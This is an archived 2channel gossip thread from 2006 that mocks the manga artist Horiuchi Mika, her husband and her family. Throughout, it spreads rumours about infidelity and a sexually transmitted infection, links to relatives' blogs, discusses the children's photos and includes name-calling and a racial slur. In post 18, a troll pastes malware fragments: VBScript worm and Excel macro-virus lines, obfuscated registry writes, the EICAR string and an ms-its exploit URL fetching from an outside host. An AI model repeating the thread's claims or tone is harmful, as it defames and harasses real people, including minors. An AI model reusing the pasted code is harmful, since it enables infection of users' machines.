2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【今更チョイ悪オヤジ?】堀内三佳37コマ目【ただの黒ハゲ】

1 :花と名無しさん:2006/09/29(金) 15:35:38 ID:???P
前スレ
【ヲチ専用スレ】堀内三佳36コマ目【儲は無視スルー】
http://comic6.2ch.net/test/read.cgi/gcomic/1147354730/
家の新築(義父にお強請り、義母に買い物を頼んでおいて愚痴、不満だらけの同居、義父母の寝室の側に大騒音の
エアコンの室外機設置) 石鹸(何ヶ月も引っぱりあげくいつものお強請り)・ジュートアニマル>お節事件(弟のノルマは無視、
麻人形に無駄遣い)… と他から見て(゚Д゚)ハァ?な"シャクレセンス"をアピール三昧、 お強請り・たかり・クレーム・
嘘情報も満載、眼鏡事件・ベランダ事件・弟嫁事件・アレルギー事件 「な」開き直り事件?夫の黒女とのケシゴム不倫
・性病患い(原因は夫の浮気。結膜炎と騙され、鵜呑みにして紙面で公表)、 セックスレス告白、パンツで体を洗う…
胡桃アレルギーの次女にミックスナッツ食べさせたり、 インフルエンザでもないのに長女に次女のタミフルを服用させたり
読者から指摘されると疳の虫せいと言い訳、実妹が膠原病などなど、次々と我々を驚愕させるミカリン。
そしてロリータを煽ってるとしか言いようのない自サイトでの娘写真公開、自宅公開。
さらになんちゃってメンヘルで32条を申請し休職中の夫ラリゴが自らこのスレの閲覧と不倫を認める告白を。
都合の悪いレスが付くと現れる荒らしは果たして本人なのか?
テーシャツ屋を始めるも過剰在庫で放り出す。
子供たちは学校を休ませてまでハワイなんちゃって留学、でも実際はほとんど遊び。
ラリゴは急にベジタリアンに目覚めるも帰国後はすっかり忘れる。
相変わらず酒びたり過剰喫煙で自称チョイ悪オヤジのつもりらしいが、どう見ても南国前線に飛ばされた旧日本兵。
黒女とも復活?バイクを購入するも、モンキーと違い足が届かなくて難儀?

ブログで都合の悪いレスがつくと「心ないコメントの件はフツーに書いて下さっているコメントを
悪く解釈することは絶対にないので安心して楽しいコメントを寄せて下さいね。いままで削除は
していません。ちょっと不快なコメントがあっても」「実は今回の件で私は全く凹んでないですよー。」
「もともと私のマンガ等は失言、言葉足らずばっかり」と改善する努力も無し、常に開き直って気に入らない読者は
無視し続け、いつ事件が起きてもおかしくないような一家描いた「夫すごろく」他、堀内三佳作品を語りましょう。

スレ参加上の注意、過去ログ等は>>1-20ぐらい

2 :花と名無しさん:2006/09/29(金) 15:36:11 ID:???P
【注意!】
堀内三佳の否定的な意見が耐えられない方は、見ないことをお勧めします。
見たことによる不愉快等の苦情はスルーされます。
スレ初心者は、>>1-20及び過去ログ(ほぼリンク済み)を読んでから 書き込みをしましょう。
↑を読まずに『"初めて"来たけど、"なんで"こんなことになっているの?』
『"面白いのになんで"叩くの?』『叩くほどのことは書いていない』を繰り返す者は荒らし扱いされます。

3 :花と名無しさん:2006/09/29(金) 15:37:12 ID:???P
過去ログ 1
★★★夫すごろくに飽きた!★★★
http://makimo.to/2ch/piza_gcomic/964/964718792.html
『夫すごろく』の堀内三佳
http://salad.2ch.net/gcomic/kako/971/971427117.html
『夫すごろく』の堀内三佳〜2コマ目〜
http://salad.2ch.net/gcomic/kako/980/980091220.html
夫すごろく〜3コマ目〜
http://salad.2ch.net/gcomic/kako/992/992238908.html
夫すごろく**4コマ目**
http://salad.2ch.net/gcomic/kako/993/993615194.html
夫すごろく**5コマ目**
http://salad.2ch.net/gcomic/kako/996/996295799.html
夫すごろく**6コマ目**
http://comic.2ch.net/gcomic/kako/999/999900188.html
夫すごろく**7コマ目**
http://comic.2ch.net/test/read.cgi/gcomic/1016594465/
夫すごろく**8コマ目**
http://comic.2ch.net/gcomic/kako/1022/10224/1022403654.html
夫すごろく**9コマ目**
http://comic.2ch.net/gcomic/kako/1029/10290/1029026131.html
【夫と黒女】夫すごろく10コマ目【消しゴム不倫】
http://comic.2ch.net/gcomic/kako/1033/10335/1033564062.html
【おねだり?】夫すごろく 11コマ目【たかり?】
http://comic.2ch.net/gcomic/kako/1036/10362/1036223389.html
【ネダリン】堀内三佳「夫すごろく」12コマ目【タカリン】
http://makimo.to/2ch/comic_gcomic/1042/1042862592.html
http://comic.2ch.net/gcomic/kako/1042/10428/1042862592.html
【誌面デ】堀内三佳「夫すごろく」13コマ目【オ強請リ】
http://makimo.to/2ch/comic_gcomic/1050/1050041738.html

4 :花と名無しさん:2006/09/29(金) 15:37:45 ID:???P
【人を傷付ける】堀内三佳14コマ目【天才】
http://makimo.to/2ch/comic_gcomic/1059/1059947547.html
【幼女写真オンパ】堀内三佳15コマ目【ロリカモーン】
http://makimo.to/2ch/comic_gcomic/1066/1066355390.html
(※16コマ目はありません)
【子供は\ぢぇる】堀内三佳17コマ目【母はお強請り】
http://makimo.to/2ch/comic_gcomic/1068/1068457597.html
【夫は怒鳴り】堀内三佳17.5コマ目【妻は強請る】
http://makimo.to/2ch/comic_gcomic/1071/1071706595.html
【夫婦揃って】堀内三佳18コマ目【性病】
http://makimo.to/2ch/comic2_gcomic/1076/1076567985.html
【妻はお強請り】堀内三佳19コマ目【夫は自演】
http://makimo.to/2ch/comic4_gcomic/1080/1080649122.html
【妻は不義理】堀内三佳20コマ目【夫は不貞】
http://comic4.2ch.net/test/read.cgi/gcomic/1085065242/
(html化待ち。「にくちゃんねるhttp://makimo.to/2ch/」にはUPされていません…)
【妻は結膜】堀内三佳21コマ目【夫は粘膜】
http://makimo.to/2ch/comic6_gcomic/1088/1088686060.html
【妻は暴露】堀内三佳22コマ目【夫は32条】
http://makimo.to/2ch/comic6_gcomic/1090/1090511465.html
【妻はネタ無】堀内三佳23コマ目【夫は乳忍者】
http://makimo.to/2ch/comic6_gcomic/1091/1091524562.html
【妻は内職】堀内三佳24コマ目【夫は無職】
http://makimo.to/2ch/comic6_gcomic/1092/1092681325.html
【妻はサルモネラ】堀内三佳25コマ目【夫はクラミジア】
http://makimo.to/2ch/comic6_gcomic/1096/1096899611.html
【胡桃アレルギに】 堀内三佳 26コマ目【ミックスナッツ】
http://makimo.to/2ch/comic6_gcomic/1100/1100427810.html
【フィールヤングコーラス】堀内三佳27コマ目【お荷物マンガ】
http://comic6.2ch.net/test/read.cgi/gcomic/1102157116/

5 :花と名無しさん:2006/09/29(金) 15:39:32 ID:???P
【ブログでも】堀内三佳28コマ目【愚痴とお強請り】
http://comic6.2ch.net/test/read.cgi/gcomic/1119274923/
【垂れ流しブログで】堀内三佳28コマ目【裸の王様】※実質29コマ目
http://comic6.2ch.net/test/read.cgi/gcomic/1122961851/
【単行本宣伝に必死】堀内三佳30コマ目【夫はヒモ状態】
http://comic6.2ch.net/test/read.cgi/gcomic/1126785946/
【ヲチ・アンチ専用スレ】堀内三佳31コマ目【マンセーはブログへ】
http://comic6.2ch.net/test/read.cgi/gcomic/1127219110/
【ヲチ・アンチ専用スレ】堀内三佳32コマ目【夫すごろく】
http://comic6.2ch.net/test/read.cgi/gcomic/1128492892/
【ヲチ・アンチ専用スレ】堀内三佳33コマ目【アラシ儲はスルー】
http://comic6.2ch.net/test/read.cgi/gcomic/1129612162/
【ヲチ専用スレ】堀内三佳34コマ目【儲はスルー推奨】
http://comic6.2ch.net/test/read.cgi/gcomic/1136769604/
【ヲチ専用スレ】堀内三佳35コマ目【儲は無視スルー】
http://comic6.2ch.net/test/read.cgi/gcomic/1136769604/
【ヲチ専用スレ】堀内三佳36コマ目【儲は無視スルー】
http://comic6.2ch.net/test/read.cgi/gcomic/1147354730/

ベランダ事件のスレ
漫画家・堀内三佳:逆ギレして全国紙で報復!
http://makimo.to/2ch/cheese_kankon/992/992334899.html

ブログでレスする複数の人と同じ異臭がするスレ
【790=860自作】堀内三佳27コマ目【自演粘着叩き】
http://makimo.to/2ch/comic6_gcomic/1101/1101454902.html
【ID非表示】堀内三佳28コマ目本スレ【自作自演叩き】
http://makimo.to/cgi-bin/dat2html/dat2html.cgi?http://comic6.2ch.net/test/read.cgi/gcomic/1102151979/

6 :花と名無しさん:2006/09/29(金) 15:43:26 ID:???P
登場人物紹介
堀内三佳:ミカリン シャクレ 【漫画家】
フィールヤング(夫すごろく連載)
フィールヤングWEBサイト(料理すごろく 家すごろく連載)
コーラス、コーラス別冊(おせっかいclab連載)など
北海道在住、小学校に通う姉妹の働くママ?
夫はwebディレクター:ラリゴ ゴリラ タカーギ ギータカ(業界風)(自称フリー)
退職時に失業保険も貰わず、勢いで起業。かなり行き当たりばったり。
夫の両親と二世帯住宅に住むが、義父義母は"階下の人"と赤の他人のような間借り扱いされています
近所住むシャクレの両親(1丁目のじじばば)もまるで自分の家のように堂々と出来入りしてます。
なお、階下&一丁目表現は「こだわり」ではじめて読む人がわからなくてもキニシナイ謎のこだわり。

「夫すごろく」
紅円 ニコ 夫の身の回りに起こるエッセー漫画
ほのぼのしたイラストに、漫画と並行してweb、ブログ上にて身の上ネタ投下の夫に注目!
長女はお菓子大好きで神経質?、次女は暑がりで裸族?

堀内三佳のブログ
tp://urasugo.exblog.jp/

夫・高木敏光のブログ
tp://takagism.exblog.jp/

夫に雇われる堀内三佳妹のブログ
http://patchwork.exblog.jp/
※難病持ちなのにハワイで体調を崩しても、イルカショーを優先されて病院に連れて行って貰えないなどやや虐待されている模様。

掲載誌スレ
フィールヤング ★ FEEL YOUNG ★24
http://comic6.2ch.net/test/read.cgi/gcomic/1152944137/
◆◇コーラス その26◆◇
http://comic6.2ch.net/test/read.cgi/gcomic/1158074374/

7 :花と名無しさん:2006/09/29(金) 15:45:23 ID:???P
堀内三佳のブログのブログ登場とともに、前々スレより、堀内三佳の叩きは一切認めないという方の発言が
出ており、前スレは今までの住人叩きが繰り返され、まともなスレ進行はしていませんでした。
このスレでも同様の可能性があります。 前スレも大暴れでした。

もともとの住人の仲間割れを狙ったと思われる、読み手を混乱させるような
住人叩きでしたので、決して釣られませんようにご注意下さい。

堀内三佳の叩きは一切認めないという方の住人叩きは、以前のスレでもありまして
勝手に重複スレを立てたりと(削除依頼による削除されています>>6参照)
定期的に繰り返される「スレ荒らし行為」です。

8 :花と名無しさん:2006/09/29(金) 15:46:49 ID:???0
懐かしの夫AA
          (      (       ( 
        体   )     ) ぼ た  )
  (  加  臭 (      ( る ち  (
   ) 齢  口 )      ) ぅ の  )
   ( 臭  臭(      (  .|   (
     )            )    )
        (~~^)  ___,- 彡__..  (⌒)
        |  |,/"   ~゙ .`ヽ、. | |    〜・
        |  |   丿ノ\ヽ | .|  |
        |  |  ー-ー'' `ー-' l.`.|  |
        |  l、彡 ー-'  `ー' \|  |
.        \ C、〃 、_____,〃 ./  /
.  .・〜     、/\_|___/_/\/
           \;:;:;:;:;:;:;:;:;:;:;:;:;:;:/
.    ・〜     {;;:;:;:;:;:;:;:;:;:;:;:;:;:;:}
           /  ̄ ̄ ̄ ̄ ゙̄/
          ノ______________・_/
.     ((   (iiiiiiiiiiiiiiiiiiiiiiiiiiiiiii/   ))
          "\⌒"\/⌒|"
.            \  ゙`> |
.  .         __/  / /
.           |  /'  /
.           |/゙~,_/ /
             \ |
.              ゙ヽl

残念ながら、漫画でのかわいい表現とは似ても似つかない方のようです。
過度の喫煙と飲酒でかなり臭うそうです。
ブログで大学生(二部)時代のセックス体験を綴っておられます。
 当時の自称交尾相手の大野祥子こと細野陽子
http://shinoyama.cplaza.ne.jp/salon/asahi/asahi87_L_html/asahi87_L21.html

9 :花と名無しさん:2006/09/29(金) 15:47:20 ID:???0
[荒らしについて]
夫に関しての都合の悪い書き込みがあると"なぜか"荒らしが現れます。
最初は夫を批判するようなことを書きつつも、
夫に都合のいい嘘情報を流すなどして擁護をしていました。
レス削除の依頼を撥ねられた結果、AA投下、コピペ嵐でスレを消費しようと画策しました。
また、漫画やネットで"自ら公開している"すごろく登場人物の「個人情報」
についてココで話すことを「法律に触れる」「警察に通報した」などと
脅しをかけました。
さらに、22コマ目ではもとから居た住人のレスを「粘着叩きレス」と思わせるため
に画策し、自作自演の「叩きを叩くレス」を繰り返し、混乱を招こうとしていました。
23コマ目では勝手に荒らしスレを立てたり、他スレにコピペ投下したり、
嵐は一人ではないことを必死にアピールしていましたが、AAもスレも削除されました。
その後スレに関係ないコピペ投下で反撃を試みるもスルーされ、
DQNスフに成りすまし、今度はシャクレのDQN子育てを擁護するもスルー。
手は出し尽くしたようで、現在は
『煽り文句はお決まりの「僻んでんでしょオバハン」』
に戻ってアゲながら必死に夫擁護に励んでいます。

珍しいほどのかまってちゃんなので、住人の皆さんはスルーを徹底しましょう。

荒らしの正体については言及しませんが、
「妻のことが話題になっている時にはほとんど出てこない」
「『尊敬している高木氏』というような表現が多い」
「クリエーターや業界人マンセー(住人を『一般人』と罵倒)」
「決まり文句は『専業主婦』『更年期』『一般人』」
「『ここ、初めて見たんだけど〜』を強調」
ということを付け加えておきます。

※最近はシャクレマンセー儲しか出没していませんが、参考のために残しました。


10 :花と名無しさん:2006/09/29(金) 15:47:50 ID:???0
[mixiより ラリゴ2ちゃん閲覧告白]
2004年07月16日12:11 2ちゃねら
わざわざ「報告」をしてくれた人がいたから、
 久 々 に 2 ち ゃ ん を 覗 い た ら、
また溜まっていたなあ。
1時間も読んでしまった。
目が疲れたぞ。

みんなよくこんなに書くことあるなあ。
ほんとおつかれさま。

つ〜か、ほっといてくれよ〜、俺が何飲もうが飲むまいが、浮気をしようがしまいが〜。
車を2台しか置けないうちでもいいじゃんか〜。
《黒い女》が元恋人でも愛人でもい〜じゃんか〜。
「消しゴムは確かにそこにあったかもしれない」くらいにしておいてくれよ〜。

それと、鬱病じゃないから心配しないでくれよ。性病でもないしさ〜。
それとさ〜、女生徒のヌード撮ったって……それ、なんだよ。まったくわからんぞ。

なんか、「キタ〜」とか言われると、うっかり知らない人のMIXIも踏めないや。

いや、面白いし、タメになるんだけどさ、2ちゃん。

ほんと、提督も、おつかれさまだったんだろうねえ
( 俺、 そ の ス レ は 知 ら な い ん だ け ど )。


※mixiは一度退会しましたが、自作Tシャツ販売宣伝のために再度登録しています。
高木氏は足あとに敏感な方ですので、踏み込みは時はご注意ください。
なお日記は友人まで公開、マイミク登録は自作Tシャツを買った人のみらしいです。


11 :花と名無しさん:2006/09/29(金) 15:48:24 ID:???0
クラミジア顛末 1
[17コマ目より抜粋]
889 :花と名無しさん :04/02/10 14:16 ID:7DT8US/5
半年前くらいから体調が悪く(婦人科系の)
ハシモト先生に見てもらったら、性感染症で夫と一緒に治療するようにと言われる
普通なら夫に「浮気したの!」と怒るところだけど、去年は家等で忙しく1年間Sレスなので覚えが無い
自分も浮気してないし〜
夫が調べると、結膜炎と同じ菌
半年前ちょうどひどい結膜炎になっていたので、それだ!と原因がわかってホッとしたなり
だけど、ミカリンの代わりにお薬もらいに行った夫がナースに「気をつけてあげなさいよ」
と軽蔑の目をむけられショック

ということです。
その菌はいったいなんて名前なんだろうな〜?

890 :花と名無しさん :04/02/10 14:27 ID:Bt6oZggo
クラミジアかな?
性感染症については、感染後すぐ症状が現れるわけではなく、
潜伏期間があったりするので、1年間レスでもその前に感染した
可能性があるのよね〜。
その辺は感染症の種類によっても違ってくるけど、
クラミジアの場合、自覚症状がないのがほとんどなので
体調が悪くなった半年よりもかなり前から罹っていた可能性が大なんじゃ?
クラミジアなら妊娠時に検査があると思うので、
ニコ出産後に夫からうつされたんじゃ?
そのころって、ちょうど夫が黒女と浮気してた頃だよね…
      ( ´д)ヒソ(´д`)ヒソ(д` )

12 :花と名無しさん:2006/09/29(金) 15:49:07 ID:???0
クラミジア顛末 2
[18コマ目より抜粋]
104 :花と名無しさん :04/02/16 14:38 ID:???
性器クラミジアも結膜炎の1種であるトラコーマも、クラミジア・トラコマチスという菌が原因。
このことだけ考えると「結膜炎から性器クラミジアになったのね。納得」と
なってもおかしくはない。

しかしトラコーマは昭和時代(20〜30年代?)にはやり目として1世を風靡したが、
衛生環境が良くなった現在では眼科医も伝説として扱うほどの病気。
クラミジア菌による結膜炎が心配されるのは、母親が性器クラミジアで
出産時に新生児に感染するもの。そのため、妊婦検診では一般的に
クラミジア検査が行われる。
成人のトラコーマ性結膜炎もまれにあるが、性行為による感染と考えられている。

…というわけで、シャクレの結膜炎がクラミジア菌によるものだったら
一体その菌はどこから来たって言うんだ(゚Д゚)ゴルァ!!となるので、
結膜炎からのクラミジアはありえないってことです。
シャクレの結膜炎は原因はクラミジア菌以外だったか、
性器クラミジアに罹ってから、その菌が目に移って結膜炎になったか
どちらかでしょう。

13 :花と名無しさん:2006/09/29(金) 15:50:05 ID:???P
http://www.2ch.net/before.html のおやくそく。より

> 芸能人や公人ではない一般人の誹謗中傷、プライバシー暴露は禁止してます。

堀内三佳氏は一応プロの漫画家ですので「公人」にあたります。
単行本印税で、年収が一千万超えたこともあります。
現在連載中の漫画も、実在の家族、出来事をネタしたほぼノンフィクション、
作家自ら自身のプライバシーの暴露をしていますことをご承知の上、参加してください。


・頭のおかしな人には気をつけましょう

利用者が増えるに従って、頭のおかしな人もそれなりに出没するようになって来ています。
頭のおかしな人に関わるとなにかと面倒なことが起こる可能性があるので、注意しましょう。


頭のおかしな人の判定基準

・「みんなの意見」「他の人もそう思ってる」など、自分の意見なのに他人もそう思ってると力説する人
 他人が自分とは違うという事実が受け入れられない人です。自分の意見が通らないとコピペや荒らしなど
 無茶をし始めるので見かけたら放置してください。

・根拠もなく、他人を見下したり、差別したりする人、自分で自分を褒める人
 他人を見下すことで自分を慰めようとする人です。実生活で他人に褒めてもらう機会がないが
 プライドだけは高いとか、匿名の掲示板しか話し相手のいない人です。可哀想なので放置してください。

・自分の感情だけ書く人
「〜〜がムカツク」とか自分の感情を掲示板に書くことに意味があると思っている人です。
何がどのようにムカツクのか論理的に書いてあれば、他人が読んでも意味のある文章になりますが、
そういった論理的思考の出来ない人です。もうちょっと賢くなるまでは放置してあげてください。

14 :花と名無しさん:2006/09/29(金) 15:51:27 ID:???P
堀内三佳氏の漫画スタイルのわかりやすい解説。
掲載誌、フィールヤングのスレから転載させていただきました。


  「ミカリン」
    の
             スゴロクは   
 酷く    【読みづらい】
    ので

                        最近では
       読み飛ばしている    【ノダガ】
本誌では扱いが良く
      見える     のが 
                         (不思議でたまらないんだよねー) (ねー)←ぐ


基本はたぶん四コマ漫画ですが、四コマで終わっているものほとんどなく、8コマもしくは12コマで
最高16コマで構成されているため、四コマ漫画の基本である起承転結は全くありません。
さらに1コマに細かい手書き文字で縦書き横書き斜め書きでびっしり書き込まれているため、上記の解説のように
読みづらく感じている方が多いです。

15 :花と名無しさん:2006/09/29(金) 15:51:48 ID:???0
フィーヤンスレより

230 名前:花と名無しさん[sage] 投稿日:2005/10/18(火) 00:20:43 ID:???0
ミカリンは、次女のことだけ漫画にしてほしいな。
一番ほのぼのしてて、かわいい。
人の嫌みを言ったり、愚痴の部分はいらない。

233 名前:花と名無しさん[sage] 投稿日:2005/10/18(火) 12:24:38 ID:???0
>>230
というか、赤ちゃんネタ以外は面白くないんだと思う。
ぐっちゃんが小さい頃の話も面白かった。ほのぼのしてて。
今は登場人物が皆大きくなって日常を描いててもフ〜ンって感じ。

234 名前:花と名無しさん[sage] 投稿日:2005/10/18(火) 14:00:25 ID:???0
>>233
ゲコみたいに曲がりなりにも情報発信(縫い物とか興味ないけど)
しているんならまだしも、日常の愚痴オンパレードだもんね・・。


2006年5月号に関しては、愚痴悪口が少なかったように読めましたが、
相変わらずギチギチに描きこんでいますので、見落としているだけかもしれません。

16 :花と名無しさん:2006/09/29(金) 15:54:17 ID:???0
最後に・・・シャクマン儲とは・・・シャクレ+マンセー+信者

いいか、みんな
        (゜皿゜ )
        (| y |)

      信じる者と書いて信者
       信  ( ゜皿゜)  者
       \/| y |\/

    二つ合わされば儲けるとなる
        ( ゜皿゜)  儲
        (\/\/

 つまり信者がいればいるほど儲かると言うことだ
        (゜皿゜ )
        (| y |)

以上に倣って、シャクマン儲となりました。
気に入らない書き込みに対して、怒涛のレスをつけることから"珍走シャクマン儲"とも呼ばれます。珍走とは珍走団から。

生シャクレと彦麻呂ラリゴはこちら
ttp://www.ikuseikyo.jp/pdf/touch/touch17.pdf

17 :花と名無しさん:2006/09/29(金) 18:48:24 ID:???0
>>1
スレ立て 乙です。

18 :<body onload=window()>:2006/09/29(金) 20:43:34 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

19 :花と名無しさん:2006/09/29(金) 21:12:54 ID:???0
早速臭いハゲが書き込んでますねw

20 :花と名無しさん:2006/09/29(金) 21:13:40 ID:???0
あらー、今時こんなの貼るやついるなんてまだいたんだ。

21 :花と名無しさん:2006/09/29(金) 22:57:33 ID:???O
おつ!
そういや自称小麦アレルギーネタもあったよねwww

小麦摂取したら眠くなるといいつつ、ラーメン、パスタ、うどん、ナン食べまくりwwwww

22 :花と名無しさん:2006/09/29(金) 23:14:29 ID:???0
本当は、お腹いっぱいになって眠くなっちゃう病。子供かよ!

23 :花と名無しさん:2006/09/30(土) 19:52:34 ID:???O
さすがに伸びないね〜…

くろみえのミクシではくろみえ一家が北海道上陸で、
「タカギズムに会えないのは残念。おねえさまたち(ぐとに)に娘を会わせたかった」
みたいな下りがあったよ。

元不倫相手にこれだも。
何かぶっとんでますね。

24 :花と名無しさん:2006/09/30(土) 20:04:35 ID:KiKRy90h0
糞すれあげ

25 :花と名無しさん:2006/10/01(日) 01:23:19 ID:???0
>>23
クロンボ同士、どこか他人と違うことに快感を得る体質らしいですから。

26 :花と名無しさん:2006/10/01(日) 05:27:32 ID:kzN+vh+40
age

27 :花と名無しさん:2006/10/01(日) 11:07:39 ID:vnrKTGm+0
もうこのスレも限界ですね。

28 :花と名無しさん:2006/10/01(日) 11:39:22 ID:???0
心配しなくてもボチボチ進んでますから。ネタは尽きないしw

29 :花と名無しさん:2006/10/01(日) 14:48:07 ID:vnrKTGm+0
ネタなんて尽きてるし 無理やり引っ張り出して来てるだけだろ。

30 :花と名無しさん:2006/10/01(日) 14:59:19 ID:???0
黒ハゲ乙

31 :花と名無しさん:2006/10/01(日) 15:06:48 ID:???0
>>29
わざわざあんなキモ写真載せる自体、かまって欲しい証拠ジャマイカw

32 :花と名無しさん:2006/10/01(日) 17:07:20 ID:???0
自分の父親があんなナル丸出しの写真とってたら
本当にひいちゃうけどな
しかも嬉々として載せてるしさ・・

33 :花と名無しさん:2006/10/01(日) 20:46:44 ID:???0
これからもっとあちこちに載せるらしい・・・
















ゔぉぉぉぉぉぉぉぉぉぉえ!!ゲロゲロゲェ――――――――――!!!!
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
               ぅぉぇっぷ
           〃⌒ ヽフ
          /   rノ     
         Ο Ο_);:゚。o;:,.          

34 :花と名無しさん:2006/10/02(月) 12:29:44 ID:???0
>33
どこに載せるの?


35 :花と名無しさん:2006/10/03(火) 06:19:58 ID:aYgUrzq6O
テンプレまとめて貼れよ。
>>1さんよ〜('A`)


36 :花と名無しさん:2006/10/03(火) 09:52:30 ID:???0
字数制限を理解できない臭黒ハゲ

37 :花と名無しさん:2006/10/03(火) 12:30:01 ID:???0
しゃくれ妊娠したか?

38 :花と名無しさん:2006/10/03(火) 12:44:01 ID:???O
なんで?

39 :花と名無しさん:2006/10/03(火) 12:46:43 ID:???0
生理あがっちゃってるんじゃない?

40 :花と名無しさん:2006/10/03(火) 13:00:33 ID:???0
でも妊娠してたらおめでたいじゃない。
もともと三姉妹にあこがれてたんでしょ?
また赤ちゃんの生活を描いた○○すごろく読みたいよ。

41 :花と名無しさん:2006/10/03(火) 13:35:02 ID:???O
どこかで妊娠したような事書いてるの?

42 :花と名無しさん:2006/10/03(火) 13:54:05 ID:???0
セックルレスじゃないといいたいのでは?

ネタのための妊娠だったらオソロシス

43 :花と名無しさん:2006/10/03(火) 16:50:21 ID:???0
相変わらずまとめてくるね

44 :花と名無しさん:2006/10/03(火) 17:09:10 ID:???0
コーラスで最近肉を食べてないって、肉コーナーをスルーする
イラスト描いてた。
野菜ばっかり食べて肉が入らないそうだ。
何の影響だろう

45 :花と名無しさん:2006/10/03(火) 17:25:52 ID:???0
突発的ハワイヨガ洗脳

もう解けてるがw

46 :花と名無しさん:2006/10/03(火) 19:17:41 ID:???0
一時期、メニューを考えるのが大変で粗食の本読んで
ご飯を食べときゃいいんだって自分を正当化してたよ
ぐは偏食だし、自分も肉使うメニュー考えんの嫌だから
もやしは畑のお肉として使ってるんじゃね

47 :花と名無しさん:2006/10/03(火) 19:27:11 ID:???O
もやしって畑のお肉って言う?
大豆じゃないの?

48 :花と名無しさん:2006/10/03(火) 19:54:24 ID:???0
一人暮らしの時は果物で生きてた、とか昔のすごろくにあったような。
もともと肉無くても大丈夫なタイプなのでは?
娘は階下で食べさせてもらえるしさ。

49 :花と名無しさん:2006/10/03(火) 22:10:48 ID:???0
ミカリンは畑のお肉って言ってたよ
どう考えても栄養無さそうなのにさ
あれほとんど水分ジャン

50 :花と名無しさん:2006/10/03(火) 22:25:15 ID:???0
もやしに栄養あること知らない人がいるんだ。
ttp://www.moyashi.or.jp/mamechisiki/03/03.htm

51 :花と名無しさん:2006/10/04(水) 00:48:39 ID:???0
畑のお肉ってジャガイモのことだと思っていた

52 :花と名無しさん:2006/10/04(水) 08:04:48 ID:???0
ハワイ、公共の場所は全面禁煙www

53 :花と名無しさん:2006/10/04(水) 08:08:31 ID:???0
だからナムルとか作って大量に摂取しようとしてたのかな


54 :花と名無しさん:2006/10/04(水) 08:48:31 ID:???0
食えばイイというものでもなし・・・しかし極端から極端に迷走しまくり。

55 :花と名無しさん:2006/10/04(水) 17:01:19 ID:???0
ネタ尽きたね

56 :花と名無しさん:2006/10/04(水) 17:37:55 ID:???0
ネタつきた
そうおもいこむ
黒ハゲや

57 :花と名無しさん:2006/10/04(水) 17:48:23 ID:???0
2点

58 :花と名無しさん:2006/10/04(水) 18:15:42 ID:???0
ラリゴは時代の最先端逝ってるつもりなんだろうね。

59 :花と名無しさん:2006/10/04(水) 19:17:38 ID:???0
なんかいちいちもったいぶる奴だよな
どんだけ自分が注目浴びてると思ってんだよ
脳内では相当世間が騒いでるみたいだけどさ
それにフラッシュのクオリティってショボイよね


60 :花と名無しさん:2006/10/04(水) 19:46:33 ID:???O
そう、もったいぶったりほのめかしたりキモいんだよ。
ありゃ誰からも信頼されないぜ、潔く生きる勇気が皆無。
単細胞めが。

61 :花と名無しさん:2006/10/05(木) 12:18:58 ID:???0
マイコ(しゃくれ妹)のふくらはぎ
太っ!!!!
よくblogに晒せるね。

しゃくれも以前すごろくのどっかで
自らの足をごん太と書いてたけど
姉妹で足が太いのね。

62 :花と名無しさん:2006/10/05(木) 12:30:55 ID:???0
>61
そお?言うほど太くないけど?ってかあれだけじゃ太いか細いかわからんってw

63 :花と名無しさん:2006/10/05(木) 13:28:27 ID:???0
膝下の肉の付き具合で分かるけど…
細くはない感じだけど、太っ!とか言う程でもないよね。
自分と比べてだけどさ。

64 :花と名無しさん:2006/10/05(木) 18:47:18 ID:???0
無理やり批判しなくても。

65 :花と名無しさん:2006/10/05(木) 19:19:18 ID:???0
多かれ少なかれ太いものは太い
書き込まれたくなかったら、披露しなければいいこと

66 :花と名無しさん:2006/10/05(木) 19:23:50 ID:???0
ニワトリのシャクレ

67 :花と名無しさん:2006/10/05(木) 20:18:55 ID:???0
>多かれ少なかれ太いものは太い
だから何?
どうせ叩くならもっとマシな事で叩けばいいのに。

68 :花と名無しさん:2006/10/05(木) 20:37:17 ID:???0
あれは、ゴム長?

69 :花と名無しさん:2006/10/05(木) 21:18:46 ID:???0
>>67
マシな叩きネタ披露よろしく

70 :花と名無しさん:2006/10/05(木) 22:24:11 ID:???0
なんか今更だけど、10月号のすごろく。
ニコタンの担任の先生が
「本当は言えません」って言いつつのIQが高いっていうのを教えてくれた話。
あんなの全国紙でさらしていいのかなぁ?
他の親からうちも教えてくれって言われそう。

71 :花と名無しさん:2006/10/05(木) 23:28:20 ID:???0
たぶんみんなに同じこと言っているんだよその先生
シャクレが描くだろうと踏んでさ

72 :花と名無しさん:2006/10/06(金) 00:02:46 ID:???0
なんか一人超性格の悪い奴が紛れ込んでないか?

73 :花と名無しさん:2006/10/06(金) 03:56:25 ID:???0
多分結構前からいたと思うよ
相当ミカリン一族に対して怨念があるみたい
いつも全否定してるよね

74 :花と名無しさん:2006/10/06(金) 04:00:39 ID:???0
